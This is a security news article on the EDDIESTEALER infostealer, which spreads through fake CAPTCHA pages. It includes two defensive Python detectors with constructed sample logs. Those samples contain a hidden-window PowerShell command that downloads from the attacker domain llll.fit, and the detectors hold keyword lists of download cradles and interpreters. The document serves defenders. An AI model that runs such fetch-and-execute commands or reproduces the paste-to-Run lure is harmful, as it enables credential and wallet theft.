New EDDIESTEALER Malware Bypasses Chrome Security



EDDIESTEALER: New Rust-Based Malware Exploits Fake CAPTCHA to Steal Sensitive Data

A sophisticated malware campaign has emerged, distributing a Rust-based information stealer named EDDIESTEALER through deceptive CAPTCHA verification pages. This campaign employs advanced social engineering tactics to trick users into executing malicious code, leading to the theft of credentials, browser data, and cryptocurrency wallet information.


Attack Overview

The attack begins when users visit compromised websites that display fake CAPTCHA challenges resembling Google's reCAPTCHA. These pages instruct users to:

  • Press Windows Key + R to open the Run dialog.

  • Press Ctrl + V to paste a command.

  • Press Enter to execute the command.

Unbeknownst to the user, the website has already copied a malicious PowerShell command to the clipboard using JavaScript's document.execCommand("copy"). Executing this command downloads and runs a secondary script, gverify.js, from an attacker-controlled domain (hxxps://llll.fit/version/). This script then retrieves the final EDDIESTEALER payload, saving it with a pseudorandom 12-character filename.


Technical Details

  • Language & Obfuscation: EDDIESTEALER is written in Rust, which by itself complicates reverse engineering, and it additionally employs XOR-encrypted strings, stripped function symbols, and custom API resolution to hinder analysis.

  • Execution Flow:

    • The initial PowerShell command downloads gverify.js.

    • gverify.js executes in a hidden window using cscript, fetching the EDDIESTEALER executable.

    • The malware then exfiltrates sensitive data, including browser credentials and cryptocurrency wallet details.
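The execution flow above is a process chain, which is how it shows up in endpoint telemetry: explorer.exe (the Run dialog) launches powershell.exe with a download one-liner, PowerShell launches cscript.exe on a .js file, and the script host launches an executable with a random 12-character name. The following Python detector walks that chain over process-creation events. It is an added example, not code from the article or from the researchers who analysed EDDIESTEALER; the events in SAMPLE_EVENTS are constructed to resemble Sysmon Event ID 1 fields, the file name k3j9x2m7p1qz.exe and the user name are invented, and only the llll.fit domain is the indicator the article reports.

```python
"""Flag the ClickFix-style process chain described for EDDIESTEALER:
explorer.exe -> powershell.exe (download cradle) -> cscript.exe <script>.js
-> pseudorandom 12-character executable.

Added example, not code from the article. SAMPLE_EVENTS is constructed
telemetry shaped like Sysmon Event ID 1 records; only the llll.fit domain
comes from the article, every other value is invented."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # command line as logged


# Keywords typical of a PowerShell one-liner pasted into the Run dialog.
CRADLE_RE = re.compile(
    r"(\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|-enc\b|-encodedcommand|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)
# Final payload name: 12 pseudorandom alphanumeric characters, as the article describes.
RANDOM_EXE_RE = re.compile(r"\\[a-z0-9]{12}\.exe$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_chains(events):
    """Return (powershell_pid, reasons) for every PowerShell process that
    matches at least two indicators of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ps in events:
        if basename(ps.image) != "powershell.exe":
            continue
        reasons = []
        parent = by_pid.get(ps.ppid)
        if parent is not None and basename(parent.image) == "explorer.exe":
            reasons.append("powershell.exe spawned by explorer.exe (Run dialog)")
        if CRADLE_RE.search(ps.cmdline):
            reasons.append("download-cradle or hidden-window keywords in command line")
        for child in events:
            if child.ppid != ps.pid or basename(child.image) not in ("cscript.exe", "wscript.exe"):
                continue
            if re.search(r"\.js\b", child.cmdline, re.IGNORECASE):
                reasons.append(f"script host child runs a .js file: {child.cmdline}")
            for grandchild in events:
                if grandchild.ppid == child.pid and RANDOM_EXE_RE.search(grandchild.image):
                    reasons.append(f"12-character random executable: {grandchild.image}")
        if len(reasons) >= 2:
            findings.append((ps.pid, reasons))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, not real logs
    ProcEvent(1000, 500, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr https://llll.fit/version/ -OutFile gverify.js"'),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cscript.exe",
              r"cscript C:\Users\alice\AppData\Local\Temp\gverify.js"),
    ProcEvent(2200, 2100, r"C:\Users\alice\AppData\Local\Temp\k3j9x2m7p1qz.exe",
              "k3j9x2m7p1qz.exe"),
    # Benign: an administrator runs a local cmdlet from a console window.
    ProcEvent(2900, 500, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(3000, 2900, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -Command Get-Process"),
]

if __name__ == "__main__":
    for pid, reasons in find_chains(SAMPLE_EVENTS):
        print(f"powershell pid {pid}:")
        for reason in reasons:
            print("  -", reason)
```

Requiring two independent indicators keeps a lone `explorer.exe -> powershell.exe` launch (which administrators produce routinely) below the alert threshold, while the full chain in the sample scores on all four. In production the same logic maps directly onto a Sysmon or EDR query keyed on ParentImage, Image and CommandLine.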


Targeted Data

EDDIESTEALER focuses on extracting:

  • Browser Data: Credentials, cookies, and autofill information from browsers like Chrome, Edge, and Firefox.

  • Cryptocurrency Wallets: Data from browser-based wallets such as MetaMask, Coinbase Wallet, and Trust Wallet.

EDDIESTEALER's ability to bypass Chrome's App-Bound Encryption, which binds decryption of cookies and saved credentials to the browser's own process rather than to the logged-in user's DPAPI key alone, makes it considerably more effective at stealing that data.


Broader Context

This campaign is part of a growing trend where cybercriminals use fake CAPTCHA pages to distribute malware. Similar tactics have been observed with other malware families like Lumma Stealer and Vidar, indicating a shift towards social engineering methods that exploit user trust in familiar verification processes.


Protection Measures

To defend against such threats:

  • User Awareness: Educate users to be cautious of CAPTCHA pages that prompt unusual actions, such as executing commands via the Run dialog.

  • Restrict PowerShell Access: Limit the ability of standard users to run PowerShell. Note that the pasted command is an inline one-liner rather than a script file, so Execution Policy alone does not stop it; application control (AppLocker or WDAC) or Constrained Language Mode is needed to restrict powershell.exe and cscript.exe for standard users.

  • Endpoint Security: Deploy security solutions capable of detecting and blocking obfuscated scripts and unauthorized data exfiltration.

  • Regular Updates: Keep browsers and security software up to date to mitigate known vulnerabilities.
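When a user reports a suspicious CAPTCHA page, the quickest way to confirm whether a command was actually pasted into Win+R is the Run-dialog history: Windows Explorer records each entry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as values "a", "b", ... with a trailing "\1", and an "MRUList" value giving the order, most recent first. The Python triage below parses a `reg export` of that key and flags entries that start an interpreter together with a URL or a hidden-window switch. It is an added example for responders, not part of the article; SAMPLE_REG is a constructed export, and only the llll.fit URL is the article's indicator.

```python
r"""Triage the Run-dialog history (RunMRU) for a pasted ClickFix command.

Explorer stores each Win+R entry as a value "a", "b", ... under
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with a
trailing "\1", and "MRUList" gives the slot order, most recent first.
Added example, not from the article; SAMPLE_REG is a constructed
`reg export` excerpt and only the llll.fit URL is the article's indicator."""
import re

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="bca"
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr https://llll.fit/version/ -UseBasicParsing\"\\1"
"c"="calc\\1"
'''

# "name"="value" lines; .reg files escape backslashes and quotes inside the value.
ENTRY_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')
URL_RE = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)
# Binaries that can fetch or run code when handed a URL or script from Win+R.
INTERPRETERS = {"powershell", "pwsh", "cmd", "mshta", "cscript", "wscript",
                "curl", "certutil", "bitsadmin", "msiexec", "rundll32"}


def unescape_reg(value: str) -> str:
    return re.sub(r"\\(.)", r"\1", value)   # \\ -> \ and \" -> "


def parse_runmru(reg_text: str):
    """Return [(slot, command), ...] in MRUList order (most recent first)."""
    values = {}
    for line in reg_text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            values[m.group(1)] = unescape_reg(m.group(2))
    order = values.pop("MRUList", "")
    entries = []
    for slot in order:
        cmd = values.get(slot, "")
        if cmd.endswith("\\1"):            # drop Explorer's "\1" suffix
            cmd = cmd[:-2]
        entries.append((slot, cmd))
    return entries


def suspicious_run_entries(entries):
    """Flag Run commands that start an interpreter and carry a URL or a hidden-window switch."""
    hits = []
    for slot, cmd in entries:
        first = cmd.strip().split(" ", 1)[0].strip('"').lower()
        head = first.rsplit("\\", 1)[-1].removesuffix(".exe")
        if head in INTERPRETERS and (URL_RE.search(cmd) or HIDDEN_RE.search(cmd)):
            hits.append((slot, cmd))
    return hits


if __name__ == "__main__":
    for slot, cmd in suspicious_run_entries(parse_runmru(SAMPLE_REG)):
        print(f"RunMRU[{slot}]: {cmd}")
```

On a live host the same key can be collected with `reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg` and fed to parse_runmru; a flagged entry, together with the process chain in the endpoint logs, is strong confirmation that the fake CAPTCHA lure succeeded on that machine.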


